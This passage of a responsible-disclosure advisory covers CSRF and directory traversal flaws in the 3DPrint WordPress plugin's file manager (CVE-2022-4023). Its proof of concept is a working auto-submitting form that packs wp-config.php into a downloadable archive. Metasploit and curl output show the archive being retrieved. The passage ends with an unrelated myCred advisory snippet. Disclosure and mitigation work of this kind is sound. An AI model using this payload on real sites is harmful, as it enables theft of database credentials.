By sending a post request with the group and either the zip or tar variables set to any value will create an archive with the files specified in the file parameter. The current date and time will be appended to the file name for the archive, which will have the same base name as the file archived, or “archive” if several files are archived together. The archive will be created in the 3DPrint upload directory, but the path names of the files are not sanitized, and can contain paths outside this directory, making it vulnerable to directory traversal attacks.

To exploit this vulnerability, we created a simple payload module for Metasploit that serves as a self-submitting form with the malicious payload to the vulnerable site. The proof of concept payload sent was:

<!DOCTYPE html>
<html>
  <body>
    <form action="https://3dprint-test.ddev.site/wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
      <input type="hidden" name="group" value="1">
      <input type="hidden" name="zip" value="1">
      <input type="hidden" name="file\[1\]" value="../2022">
      <input type="hidden" name="file\[2\]" value="../../../wp-config.php">
    </form>
    <script>document.forms\[0\].submit()</script>
  </body>
</html>

As the Metasploit module would record the timestamp of when the form was sent, that made it easy to guess the correct filename for the archive created.

% msfconsole                                                                                
                                                  
msf6 > use payload/html/html\_reverse\_http
msf6 payload(html/html\_reverse\_http) > set LHOST localhost
LHOST => localhost
msf6 payload(html/html\_reverse\_http) > set LURI /
LURI => /
msf6 payload(html/html\_reverse\_http) > set PAYLOADFILE ../poc/poc-csrf-archive.html
PAYLOADFILE => ../poc/poc-csrf-archive.html
msf6 payload(html/html\_reverse\_http) > to\_handler
\[\*\] Payload Handler Started as Job 0
\[\*\] Started HTTP reverse handler on http://\[::1\]:8080/
\[\*\] http://localhost:8080/ handling request from ::1; (UUID: rhexpfwi) Request processed at 2022-12-10T11:06:49+01:00

msf6 payload(html/html\_reverse\_http) > exit

% curl -I 'https://3dprint-test.ddev.site/wp-content/uploads/p3d/archive\_221210\_100649.zip'
HTTP/2 200 
server: nginx/1.20.1
date: Sat, 10 Dec 2022 10:07:35 GMT
content-type: application/zip
content-length: 87225
last-modified: Sat, 10 Dec 2022 10:06:49 GMT
etag: "63945a39-154b9"
accept-ranges: bytes


% curl -O 'https://3dprint-test.ddev.site/wp-content/uploads/p3d/archive\_221210\_100649.zip'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 87225  100 87225    0     0  2322k      0 --:--:-- --:--:-- --:--:-- 2366k

% unzip -v archive\_221210\_100649.zip 
Archive:  archive\_221210\_100649.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
       0  Stored        0   0% 2022-12-10 10:06 00000000  ../2022/
       0  Stored        0   0% 2022-12-10 10:06 00000000  ../2022/12/
   85888  Defl:X    85655   0% 2022-12-10 10:05 724f1f67  ../2022/12/funny-cat.jpg
    1955  Defl:X     1114  43% 2022-11-01 23:25 96f2088a  ../../../wp-config.php
--------          -------  ---                            -------
   87843            86769   1%                            4 files

Notice how we can deduce the filename of the generated archive from the timestamp of the request. In this case, the server container is running one timezone behind the local timezone.

**Recommendations**

As the version of the file manager installed is independent of the version of the plugin installed, we cannot recommend a fixed version of the plugin. 

Neither have we found an easy way to update the file manager module if a new version is released at a later date.

For this reason, we consider all versions of the 3DPrint premium plugin vulnerable if the file manager component is enabled.

Our recommendation is to make sure the file manager module is disabled, _and_ that the file is removed from the site.

The easiest way is to delete the file wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php if it exists.

**Conclusions**

All versions of the 3DPrint premium plugin are vulnerable to CSRF and directory traversal attacks if the file manager module is enabled on the site. This does not affect the free version of the plugin downloaded from the WordPress.org plugin repository.

At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. The Jetpack Security bundle is one great WordPress security option to ensure your site and visitors are safe. This product includes real-time malware scanning, site backups, comment and form spam protection from Akismet, brute force attack protection, and more.

****Credits****

Research by Harald Eilertsen, with feedback and corrections provided by Benedict Singer, Rob Pugh, Jen Swisher and the Jetpack Scan team.

**Timeline**

*   2022-09-08: We were made aware of the finding and started investigating
*   2022-10-25: Contacted vendor first time
*   2022-11-01: Vendor contacted second time through a different channel
*   2022-11-08: Mass delete vulnerability disclosed (CVE-2022-3899)
*   2022-11-15: Contacted developers of Tiny File Manager about lack of CSRF protection, and directory traversal vulnerabilities.
*   2022-11-19: Tiny File Manager 2.5.0 released, fixing CSRF issues but not the directory traversal problems.
*   2022-12-13: Public disclosure

This entry was posted in Vulnerabilities. Bookmark the permalink.

Harald Eilertsen

Harald is a Certified Systems Security Professional (CISSP) with a wide background from software development and the security industry. He has a Master of Science in analog microelectronics from the Norwegian University of Science and Technology (NTNU), and has worked for companies such as Norman, Tandberg and Cisco before joining the Jetpack Scan team at Automattic.

Explore the benefits of Jetpack

Learn how Jetpack can help you protect, speed up, and grow your WordPress site.

**Get up to 53% off your first year.**

Compare plans

CVE-2022-4023: Vulnerabilities Found in the 3DPrint Premium Plugin

Cross-Site Request Forgery (CSRF) vulnerability in myCred plugin <= 2.5 versions.

**Solution**

 Fixed

Update the WordPress myCred plugin to the latest available version (at least 2.5.1).

Found this useful? Thank Lana Codes for reporting this vulnerability. Buy a coffee ☕

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress myCred Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.5.1.

**Other vulnerabilities in this plugin**

 0 present

 10 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#csrf